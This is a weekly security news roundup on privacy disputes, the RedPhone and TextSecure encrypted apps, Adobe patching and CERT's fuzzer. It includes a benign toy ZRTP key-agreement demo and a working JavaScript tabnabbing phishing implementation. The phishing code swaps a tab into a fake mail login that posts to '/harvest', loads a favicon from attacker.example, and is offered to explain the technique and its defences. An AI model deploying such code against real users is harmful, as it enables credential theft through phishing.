This Week In Security: Privacy, RedPhone and Adobe

In case you needed any reminders that privacy is one of the more pressing problems on the Web right now, this week’s news provided plenty of them. Along with stories of Facebook’s continued privacy missteps, this week gave us the gift of Google letting users install some Google code to opt out of other Google code, as well as Adobe perhaps moving to a monthly patch cycle. Read on for the full week in review.

Privacy was a major theme this week, and not necessarily in a good way. Facebook took a harsh and continuous beating over its privacy practices as users questioned why the company constantly made it so difficult to protect private data. It got so bad that Facebook actually took some action. Facebook promised to revamp its privacy controls and CEO Mark Zuckerberg said, “We have heard the feedback. There needs to be a simpler way to control your information. In the coming weeks, we will add privacy controls that are much simpler to use.”

Perhaps overshadowed by the privacy troubles Facebook was having was some news out of Google. The company released an add-on for browsers this week that enables users to opt out of, wait for it, Google Analytics. The Analytics opt-out add-on is meant to let users prevent their Web browsing activities from being sent to Google Analytics for perusal by various site owners. Google has been hammered by critics over the amount of data that Analytics collects and shares with site owners, and had promised to give users a way to opt out of the process. Whether this add-on is enough of an answer for that remains to be seen.

There was some good news on the privacy front this week, with the release of RedPhone and TextSecure, a pair of applications for Android phones that provide encrypted voice calls and text messages. Produced by security researcher Moxie Marlinspike’s new startup, Whisper Systems, the apps take a clever approach to the problem of securing digital calls and text messages. In a podcast I did with Marlinspike, he explained that RedPhone uses VoIP and an encryption protocol known as ZRTP to secure calls that are set up through the use of SMS messages. TextSecure, meanwhile, is a drop-in replacement for the existing text app on Android phones and not only encrypts the messages, but provides forward security and deniability. He hopes to have versions for other smartphone platforms in the future.
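The property that makes ZRTP interesting for a phone call is that the call key comes from an ephemeral Diffie-Hellman exchange and both ends display a Short Authentication String (SAS) derived from that key, which the two people read to each other by voice. A man-in-the-middle who relays the handshake ends up holding two different keys, so the strings on the two handsets differ. The example below is added here to illustrate that mechanism; it is not RedPhone's or Whisper Systems' code. The group (a 1024-bit MODP modulus, far too small for real use), the key hashing and the SAS encoding are simplified assumptions and not the exact ZRTP derivations.

```python
"""Toy ZRTP-style key agreement with a Short Authentication String (SAS).

Added example, not RedPhone's code. Shows why comparing a SAS by voice
defeats a man-in-the-middle on an ephemeral Diffie-Hellman handshake.
Group, hashing and SAS encoding are simplified assumptions.
"""
import base64
import hashlib
import secrets

# 1024-bit MODP modulus from RFC 2409 (Oakley group 2), generator 2.
# Far too small for modern use; chosen only so the example runs with the
# standard library alone.
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF",
    16,
)
G = 2


def sas_from_key(key):
    """Render 20 bits of a hash of the call key as 4 base32 characters.

    Four characters is the length ZRTP displays; the derivation here is a
    simplified stand-in for ZRTP's sashash.
    """
    h = hashlib.sha256(b"sas" + key).digest()
    return base64.b32encode(h[:3]).decode()[:4]


class Endpoint:
    """One call participant with a fresh ephemeral exponent for this call."""

    def __init__(self, name):
        self.name = name
        self._x = secrets.randbelow(P - 2) + 2   # private exponent, never sent
        self.public = pow(G, self._x, P)         # the value that goes on the wire
        self.key = None
        self.sas = None

    def complete(self, peer_public):
        """Derive the call key from whatever public value arrived from the peer."""
        shared = pow(peer_public, self._x, P)
        self.key = hashlib.sha256(shared.to_bytes(128, "big")).digest()
        self.sas = sas_from_key(self.key)
        del self._x   # forward secrecy: the exponent does not outlive the handshake
        return self.sas


def honest_call():
    """Alice and Bob exchange public values directly."""
    alice, bob = Endpoint("alice"), Endpoint("bob")
    alice.complete(bob.public)
    bob.complete(alice.public)
    return alice, bob


def relayed_call():
    """Mallory intercepts both public values and substitutes her own."""
    alice, bob = Endpoint("alice"), Endpoint("bob")
    m_to_alice = Endpoint("mallory-facing-alice")
    m_to_bob = Endpoint("mallory-facing-bob")
    alice.complete(m_to_alice.public)   # Alice believes this came from Bob
    bob.complete(m_to_bob.public)       # Bob believes this came from Alice
    m_to_alice.complete(alice.public)   # Mallory now shares a key with each side
    m_to_bob.complete(bob.public)
    return alice, bob


def sas_matches(a, b):
    """What the callers do by voice: read the SAS aloud and compare."""
    return a.sas == b.sas


if __name__ == "__main__":
    a, b = honest_call()
    print("honest  :", a.sas, b.sas, "match" if sas_matches(a, b) else "MISMATCH")
    a, b = relayed_call()
    print("relayed :", a.sas, b.sas, "match" if sas_matches(a, b) else "MISMATCH")
```

In the honest case both handsets derive the same key and show the same four characters; in the relayed case Alice's key depends on Mallory's exponent and Bob's on a different one, so the strings disagree. A 20-bit SAS leaves an attacker roughly a one-in-a-million chance per call of a matching string, which is why ZRTP also caches shared secrets across calls (key continuity) so a later attacker must have been present on the first call too.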

Late in the week came word that Adobe is considering changing to a monthly patch cycle, not long after it moved to its current quarterly patch release schedule last year. The company has been taking heat from customers and researchers over its response to vulnerability reports and patching times, and this may be an easy way to quell some of that criticism. Adobe has been tinkering with its security program and response process for some time now, and this is a natural part of that evolution. Releasing Reader patches on the same day Microsoft drops its load of security fixes each month could make things more predictable for customers. Coming soon to a desktop near you.

There also was news this week of a clever new phishing technique that exploits tabbed browsing, as developed by Aza Raskin of Mozilla. (I’ll spare you the name that’s been coined for the technique.) The tactic enables the bad guy to detect when a user is not interacting with a given tab in her browser and then send some commands that change the favicon and content of the tab. Après, le déluge: “As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs,” Raskin wrote.
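The mechanism Raskin describes, as an added example that is neither his demo page nor code from this article: the page waits until the tab has lost focus for a while, then rewrites its own title, favicon and body to look like a mail login. The idle threshold, the look-alike target and the focus/blur wiring are assumptions about how such a page would be built; the decision logic is kept in plain functions so it can be exercised under Node with a constructed stand-in for `document`. The point to notice is what the swap cannot change: `location`, so the address bar still shows the attacker's origin.

```javascript
// Added example: tab-swap phishing mechanism, not Raskin's demo code.
// The page wiring at the bottom is an assumption; the logic is testable
// outside a browser via fakeDocument().

const IDLE_MS = 5000; // assumption: unfocused this long before the swap

// Rewrite the visible identity of the tab. Returns what changed and what did
// not: the document location is untouched, which is the user's one reliable tell.
function disguiseAs(doc, target) {
  doc.title = target.title;
  let icon = doc.querySelector('link[rel="icon"]');
  if (!icon) {
    icon = doc.createElement('link');
    icon.rel = 'icon';
    doc.head.appendChild(icon);
  }
  icon.href = target.favicon;
  doc.body.innerHTML = target.body; // the look-alike login form
  return { title: doc.title, favicon: icon.href, location: doc.location.href };
}

// Tracks attention to the tab; performs the swap only after the tab has been
// unfocused for idleMs, so the change happens while nobody is looking at it.
function createTabnabber(doc, target, idleMs = IDLE_MS) {
  let blurredAt = null;
  let swapped = false;
  return {
    onBlur(now) { if (blurredAt === null) blurredAt = now; },
    onFocus() { blurredAt = null; },
    tick(now) {
      if (!swapped && blurredAt !== null && now - blurredAt >= idleMs) {
        swapped = true;
        return disguiseAs(doc, target);
      }
      return null;
    },
    get swapped() { return swapped; },
  };
}

// Constructed look-alike target; a real attack would copy the genuine site's
// title, icon and markup. Placeholder values only.
const FAKE_MAIL = {
  title: 'Inbox - Example Mail',
  favicon: 'https://attacker.example/mail-icon.png',
  body: '<form method="post" action="/harvest">...</form>',
};

// Browser wiring (assumed layout of such a page); runs only when a DOM exists.
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const nabber = createTabnabber(document, FAKE_MAIL);
  window.addEventListener('blur', () => nabber.onBlur(Date.now()));
  window.addEventListener('focus', () => nabber.onFocus());
  setInterval(() => nabber.tick(Date.now()), 1000);
}

// Minimal stand-in for document so the logic can run under Node.
function fakeDocument(origin) {
  const links = [];
  return {
    title: 'Harmless page',
    location: { href: origin },
    head: { appendChild: (el) => links.push(el) },
    body: { innerHTML: '' },
    querySelector: (sel) => (sel === 'link[rel="icon"]' ? links[0] || null : null),
    createElement: () => ({}),
  };
}

if (typeof module !== 'undefined') {
  module.exports = { disguiseAs, createTabnabber, fakeDocument, FAKE_MAIL, IDLE_MS };
}
```

Two practical consequences follow from the code. The user-side check is the address bar, since a page can rewrite everything inside the tab but not its own origin. And a password manager that only fills credentials on the matching origin will stay silent on the disguised tab, which is a useful signal that something is off.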

Last, but definitely not least, was the news Thursday that CERT released a fuzzing framework, meant to be a basic fuzzer for finding security vulnerabilities. The fuzzer includes a Linux virtual machine that has been optimized for fuzz testing and a set of scripts to implement a software test. There are plenty of more complex and full-featured fuzzers available, but CERT’s is meant as a lighter, easier-to-use alternative. Alternatives are nice.

Others receiving votes:

BP Twitter Account Hacked

Why Can’t Johnny Have Privacy?

USDOJ Cracks Open $100 Million Scareware Operation